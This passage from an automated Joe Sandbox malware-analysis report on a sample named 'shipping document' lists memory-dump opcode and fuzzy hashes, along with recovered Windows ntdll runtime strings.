                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 723db83d782776d04dc36ca36152fcb3a04907afe3fd226b5a6484b50582fab8
                                                                                                • Instruction ID: 941a7d5046593285f90f848988a4b984f3219921c3a90af69a7a9b41f693d64c
                                                                                                • Opcode Fuzzy Hash: 723db83d782776d04dc36ca36152fcb3a04907afe3fd226b5a6484b50582fab8
                                                                                                • Instruction Fuzzy Hash: E2D0A934601106CBEF2BCF18CA10E2EFAB0FF10640F9000ACE70092020E32CDE01DA20
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                • Instruction ID: 32a11757eb8e127a892a6afa616e59c401e7333a3e2ea7644361e20e26de459e
                                                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                • Instruction Fuzzy Hash: FBD0C93661AE80CFDA2BCB0CC5A4B15B3A4BB45F44F8104D4F402CBB22E62CD950CA00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                • Instruction ID: 37bac8aa53dada8cd188a4ac5081e16fecd9d468e57feb562fb36b1e9e379dcb
                                                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                • Instruction Fuzzy Hash: F5C08033150644AFD711DF95CD01F0177A9F798B40F000421F30447570C531FC10E644
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                • Instruction ID: c0855e23d06b373c4009b5908d72e2947fc6eaef7372b0386c5a845ad7c4f758
                                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                • Instruction Fuzzy Hash: 92D01236140248EFCB02EF41D890D9AB72AFBD8710F108019FD19076108A31ED62DA50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                • Instruction ID: 4d2d2d74efc515038af62a6d68b2e0ded14817c199cb92b216b44b336e58b80f
                                                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                • Instruction Fuzzy Hash: 45C04879701A428FCF16DB2AD2D8F89B7E4FB44740F150890E809CBB22EB24E841DA11
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2bcabf258581a9b22728a8c21f763237d74c886619da6bed8600573205c32abe
                                                                                                • Instruction ID: c9017e060716e25b949e509816222381ac2aab1d317188676f4d5ae78116e0e1
                                                                                                • Opcode Fuzzy Hash: 2bcabf258581a9b22728a8c21f763237d74c886619da6bed8600573205c32abe
                                                                                                • Instruction Fuzzy Hash: B490023160980012924071584CC46868009A7E0301B55C021E0425564CCB148B565762
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8f7e8794284e4ff441eaca377b9679d76a25b1272679a8488ae88da25703b9ab
                                                                                                • Instruction ID: dac4b3569841b350673bc62315f82805a71a2bf576ddf9e786884fe91e2b5633
                                                                                                • Opcode Fuzzy Hash: 8f7e8794284e4ff441eaca377b9679d76a25b1272679a8488ae88da25703b9ab
                                                                                                • Instruction Fuzzy Hash: 5990023120540402D20075985848786400997E0301F55D021A5025565EC7658A916632
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ae0fc2fd9edad8a6ac3e102ac33f979b53a62d79385edd146e866168162329cd
                                                                                                • Instruction ID: 3088e2c8f6c72172a762c17022a9f5d84626afae1731be393ae5524d5d659bdb
                                                                                                • Opcode Fuzzy Hash: ae0fc2fd9edad8a6ac3e102ac33f979b53a62d79385edd146e866168162329cd
                                                                                                • Instruction Fuzzy Hash: F990026121540042D20471584844746404997E1201F55C022A2155564CC6298E615626
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 30a413e401aa528c1c9af4e20c839897ab40744df954ad43b9de9910777b33b5
                                                                                                • Instruction ID: 0b011ace586e55a8c130a7e3cb357af81582a9b47e5ed0762d6390477bb6d1b7
                                                                                                • Opcode Fuzzy Hash: 30a413e401aa528c1c9af4e20c839897ab40744df954ad43b9de9910777b33b5
                                                                                                • Instruction Fuzzy Hash: FC90026134540442D20071584854B464009D7E1301F55C025E1065564DC719CE526627
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e119eff60af86539c312c969558c7e97eceaa14a8b193c721dc68b953159c732
                                                                                                • Instruction ID: c98420deb0a7d6026f96ab84bd64180e52501b8a340b885c3877c64cf894ca19
                                                                                                • Opcode Fuzzy Hash: e119eff60af86539c312c969558c7e97eceaa14a8b193c721dc68b953159c732
                                                                                                • Instruction Fuzzy Hash: E6900221215C0042D30075684C54B47400997D0303F55C125A0155564CCA158A615A22
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7f8be75337f8939a247bad7ea9b634cd4967ac41b7b7d034570e4c54922b7c9d
                                                                                                • Instruction ID: fb1d68be52fc2a346755f84bf651e2a321f683b9fc702bb996e5fd39d74afe4a
                                                                                                • Opcode Fuzzy Hash: 7f8be75337f8939a247bad7ea9b634cd4967ac41b7b7d034570e4c54922b7c9d
                                                                                                • Instruction Fuzzy Hash: 5D90022160540042424071688C84A468009BBE1211755C131A0999560DC6598A655B66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f994d09d8c9cb4e6209341a1ac0fcda9808141db4980f8e7b854a4c0d918944e
                                                                                                • Instruction ID: 127c201c2f8ad968049ab2af1317efc758ca1565fcb642246442d2f7ad42e1c5
                                                                                                • Opcode Fuzzy Hash: f994d09d8c9cb4e6209341a1ac0fcda9808141db4980f8e7b854a4c0d918944e
                                                                                                • Instruction Fuzzy Hash: F490023120580402D20071584C48787400997D0302F55C021A5165565EC765CA916A32
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 497437ed194a35ccf118b84b73c76bd4962d8bf208f5bfcb224b8ccc11d79400
                                                                                                • Instruction ID: 96f8393d02a9029337edd478771f8b736918a4d9f6a164e9f2525b17e7ea09cb
                                                                                                • Opcode Fuzzy Hash: 497437ed194a35ccf118b84b73c76bd4962d8bf208f5bfcb224b8ccc11d79400
                                                                                                • Instruction Fuzzy Hash: 3990023120580402D20071584C5474B400997D0302F55C021A1165565DC7258A516A72
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dadf081762ce18ea18a068adecd3b28ce34cac26868ff0e9677325c83156bfab
                                                                                                • Instruction ID: fce37b472937515ab76b58172fd940547be090d583f5ab3d13d22f5a84bf39f8
                                                                                                • Opcode Fuzzy Hash: dadf081762ce18ea18a068adecd3b28ce34cac26868ff0e9677325c83156bfab
                                                                                                • Instruction Fuzzy Hash: 9D90022130540402D20271584854746400DD7D1345F95C022E1425565DC7258B53A633
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6b31b28763ab0b18b370765c58c41a76a4aac8dd000b508aebbb309875213268
                                                                                                • Instruction ID: fb5e252ac257f670ec01b88d631254b38c05b84aabde8dfa3da5d63a8376c242
                                                                                                • Opcode Fuzzy Hash: 6b31b28763ab0b18b370765c58c41a76a4aac8dd000b508aebbb309875213268
                                                                                                • Instruction Fuzzy Hash: B690026120580403D24075584C44747400997D0302F55C021A2065565ECB298E516636
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3886a64c31f2d45e5d03ee521a27d7ca1de04a236a630804646674071b02c5be
                                                                                                • Instruction ID: 6d86ce609c4c94e190fb73779ccfb1049565e4331a85512a728ad3be4202460c
                                                                                                • Opcode Fuzzy Hash: 3886a64c31f2d45e5d03ee521a27d7ca1de04a236a630804646674071b02c5be
                                                                                                • Instruction Fuzzy Hash: A390027120540402D24071584844786400997D0301F55C021A5065564EC7598FD56B66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5f9f1d06d7bc0f4068c57e78a23aa5c1fdf5c4dab08de68817553cb2415d98a9
                                                                                                • Instruction ID: 1cfbd78a02b87406bba2a237a7b69af8c6bf0a67629986865a5c284e4b797422
                                                                                                • Opcode Fuzzy Hash: 5f9f1d06d7bc0f4068c57e78a23aa5c1fdf5c4dab08de68817553cb2415d98a9
                                                                                                • Instruction Fuzzy Hash: B990022160540502D20171584844756400E97D0241F95C032A1025565ECB258B92A632
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d08f2eae1e65efee887627b39434165d7b295a8cdb11fda311756b46f836971e
                                                                                                • Instruction ID: 7c941300a887e0435e7e155bfbe6ff7182b43cbacfb28aa7175582a90bee1f49
                                                                                                • Opcode Fuzzy Hash: d08f2eae1e65efee887627b39434165d7b295a8cdb11fda311756b46f836971e
                                                                                                • Instruction Fuzzy Hash: 7390022120584442D24072584C44B4F810997E1202F95C029A4157564CCA158A555B22
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5f998883817ff2c29f9f13a85f30a05617a871ab67b3e0a8c60424fe454b9b6d
                                                                                                • Instruction ID: 8d5f93982a27a2ca4670825add73a0affcdda2d1cd38d7360da276dd53027fc3
                                                                                                • Opcode Fuzzy Hash: 5f998883817ff2c29f9f13a85f30a05617a871ab67b3e0a8c60424fe454b9b6d
                                                                                                • Instruction Fuzzy Hash: 4990022124540802D24071588854747400AD7D0601F55C021A0025564DC7168B656BB2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 454607729d5c16b84a8927adf2d905536906154367baeab4622c0a69bd09226f
                                                                                                • Instruction ID: 65edb45d7268317447c89eddf21ca33a0664b957d7682eea8d4a464588a5bc71
                                                                                                • Opcode Fuzzy Hash: 454607729d5c16b84a8927adf2d905536906154367baeab4622c0a69bd09226f
                                                                                                • Instruction Fuzzy Hash: 6D90022124945102D250715C48447568009B7E0201F55C031A08155A4DC6558A556722
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2dd42dbc38f39d515cdb01fd2b266ed109f435bd60da5d641dd237f22032fc68
                                                                                                • Instruction ID: 220579c114dd461b3f856e7ce7f15321c9b0d0cfe131241921e1d3fc2226e713
                                                                                                • Opcode Fuzzy Hash: 2dd42dbc38f39d515cdb01fd2b266ed109f435bd60da5d641dd237f22032fc68
                                                                                                • Instruction Fuzzy Hash: 0090023520540402D61071585C44786404A97D0301F55D421A0425568DC7548AA1A622
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                • API String ID: 48624451-2108815105
                                                                                                • Opcode ID: 0a0bc8e8af241eaeb8374d463bd76bf6dfd103cb08c5e0849d5d476989ba7733
                                                                                                • Instruction ID: 1d37addf23195b0924fdde4ccb4341c76afd0b2d812d09e5b3f5cf31aef7634a
                                                                                                • Opcode Fuzzy Hash: 0a0bc8e8af241eaeb8374d463bd76bf6dfd103cb08c5e0849d5d476989ba7733
                                                                                                • Instruction Fuzzy Hash: 8451FAB2A00116BFCB11DFACC9D097EFBB8BB886407948269F455D7646D374DE4087E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                • API String ID: 48624451-2108815105
                                                                                                • Opcode ID: 71d49e79ae783204854e036a304937a554dc45528bda754d89b19df5719f6b67
                                                                                                • Instruction ID: 33bad3847956b67f6cab2fb8c58ebcfce6513a4924443646dae2e89218e48a38
                                                                                                • Opcode Fuzzy Hash: 71d49e79ae783204854e036a304937a554dc45528bda754d89b19df5719f6b67
                                                                                                • Instruction Fuzzy Hash: DA51E772A406456ECB64DF5CC8D09BFF7BEEF44300B248459F496C7646E6B4DB408760
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 017D4787
                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017D4725
                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017D4655
                                                                                                • Execute=1, xrefs: 017D4713
                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017D46FC
                                                                                                • ExecuteOptions, xrefs: 017D46A0
                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017D4742
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                • API String ID: 0-484625025
                                                                                                • Opcode ID: 29bd4e6694fe7212c332b37d86b0051fdc2211159af93eecebec172853c7a988
                                                                                                • Instruction ID: cbb93fe489aea184b63b42c86b1eb197eb8e5ddb1f8e34b83634d20426c33799
                                                                                                • Opcode Fuzzy Hash: 29bd4e6694fe7212c332b37d86b0051fdc2211159af93eecebec172853c7a988
                                                                                                • Instruction Fuzzy Hash: EA510971650219AAEF15AAA8EC99FEDF7B8EF58300F4400D9D605AB181E7709A49CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-$0$0
                                                                                                • API String ID: 1302938615-699404926
                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                • Instruction ID: 9072a4fdc87c7d836e3bf53c7a01537b7f69a79d8abab75ae6707d6dc838f12d
                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                • Instruction Fuzzy Hash: A0818F70E452499EEF298E6CC8917FEFFB1AFC5320F98435AE861A7291C77498408B51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: %%%u$[$]:%u
                                                                                                • API String ID: 48624451-2819853543
                                                                                                • Opcode ID: d68ba948e055a4e956b6de552bba156e4683938b5fe697f6ab2e5c438372c590
                                                                                                • Instruction ID: 7fb70119f5f8768d4a95fa3d56abfd998f5e0d310a55ac24910af924118b5971
                                                                                                • Opcode Fuzzy Hash: d68ba948e055a4e956b6de552bba156e4683938b5fe697f6ab2e5c438372c590
                                                                                                • Instruction Fuzzy Hash: 8D2151BBE00519ABDB10DF69C844AEEBBFDEF54754F540116E905E3205EB70EA018BA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017D02BD
                                                                                                • RTL: Re-Waiting, xrefs: 017D031E
                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017D02E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                • API String ID: 0-2474120054
                                                                                                • Opcode ID: f609d162f0f5e0d162d67bcea580a51ec586e5bbd17f1bc5feae79e04b78ec80
                                                                                                • Instruction ID: 434da31963cd3182dd89f3fc87b470e3e8e93dba78ec67d369678668dc42ed5d
                                                                                                • Opcode Fuzzy Hash: f609d162f0f5e0d162d67bcea580a51ec586e5bbd17f1bc5feae79e04b78ec80
                                                                                                • Instruction Fuzzy Hash: 91E1AD306487419FE725EF28C884B2AFBE0BB88324F140A5DF5A5CB2D1D775E945CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017D7B7F
                                                                                                • RTL: Re-Waiting, xrefs: 017D7BAC
                                                                                                • RTL: Resource at %p, xrefs: 017D7B8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                • API String ID: 0-871070163
                                                                                                • Opcode ID: 6a3cc7dfee0151cd0eb4642b602af3c7dc008a29a7d303ac30e8b16687d9dc23
                                                                                                • Instruction ID: 0be4412b5898f356168f99d6f703827bfacdc788ab1cc97d2ce66a685fd06258
                                                                                                • Opcode Fuzzy Hash: 6a3cc7dfee0151cd0eb4642b602af3c7dc008a29a7d303ac30e8b16687d9dc23
                                                                                                • Instruction Fuzzy Hash: 504106313047069FDB25DE29E841F6AF7E6EF88710F100A1DF95ADB680DB71E9098B91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D728C
                                                                                                Strings
                                                                                                • RTL: Re-Waiting, xrefs: 017D72C1
                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017D7294
                                                                                                • RTL: Resource at %p, xrefs: 017D72A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                • API String ID: 885266447-605551621
                                                                                                • Opcode ID: 24a0e706d5535cfef4c8e4e7100dbad9b3ff3efd4b58f63c9e64d0b1ce50d1f5
                                                                                                • Instruction ID: 5c38f63d118b98fb51d1cf57d623522b6a946f3fbec9bb94c536d604854f9311
                                                                                                • Opcode Fuzzy Hash: 24a0e706d5535cfef4c8e4e7100dbad9b3ff3efd4b58f63c9e64d0b1ce50d1f5
                                                                                                • Instruction Fuzzy Hash: 1B411F3270424AABCB25DE29DC42F6AF7B5FB94714F100619FA55AB240DB20F8069BD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
